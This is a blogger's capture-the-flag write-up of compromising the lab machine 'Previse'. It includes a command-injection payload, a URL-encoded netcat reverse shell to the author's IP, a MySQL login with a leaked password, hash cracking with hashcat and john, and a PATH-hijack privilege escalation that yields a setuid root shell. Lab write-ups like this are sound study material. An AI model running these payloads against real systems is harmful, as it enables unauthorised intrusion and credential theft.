Hello everyone,Today i’ll show you how i pwned Previse Machine.

Recon Steps

first of all after we got the ip we made a port scanning to know which ports are open… nmap -sV -sC IP ->

okey we have only 2 ports 22,80..

let’s check port 80 first.. first thing we found was a login page so i tried defaults Cred. admin:admin ooooh, it works and we logged as admin. after i loggedin i decided to recon in site firstly..

so, what i found was a sitebackup.zip and we all already know what that mean xD … source code for site. I downloaded it and start check some files like config.php and got that ->
then checked some files and the important one was logs.php ->
here i found that in php file it uses exec to run another script in system and didn’t even validate input. ** we can access this function from request to /file_logs.php and choose any delim then intercept request with Burp.

so, created my payload to check for RCE nc -nlvp 1234 then from the burp send request a file from my system. delim=comma%26curl+http://10.10.16.3:1234 and good it’s accepted 200 OK

Access [m4lwhere] user

  • so i make my payload to get revshell -> comma%26rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f%7Cbash%20-i%202>%261%7Cnc%2010.10.16.3%204444%20>/tmp/f OK we have a revshell as www-data , as we found before in config.php i go to run mysql to check databases. echo "mySQL_p@ssw0rd!:)" | mysql -u root -p and started to interact with database
    so we have m4lwhere password hash now. $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. using hashcat or john hashcat -a 0 -m 500 hash /usr/share/wordlists/rockyou.txt , john --format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt hash we got password ilovecody112235! we can now connect to ssh with this user Cred.

privilege Escalation

  • for privEsc we Run sudo -l and put the password.
    we got this script we can run as root. but we cannot edit it
  • if we read script carfully we can se that it uses date command so we can overrite this command with our code.
bash-4.4$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > date
bash-4.4$ chmod 777 date
bash-4.4$ export PATH=/tmp:$PATH
bash-4.4$ sudo /opt/scripts/access_backup.sh
  1. first line we make a copy from /bin/bash and change it’s perm then we add it to file called date.
  2. second line we change prem to file to make it executable by anyone.
  3. third line we add the path of file at begging of PATH so when we run script first date will run will execute our file not main command.
  4. we run main privilege file as sudo and wait for it.

Last step is to check for file that we copied

Congrats!!! you are root now….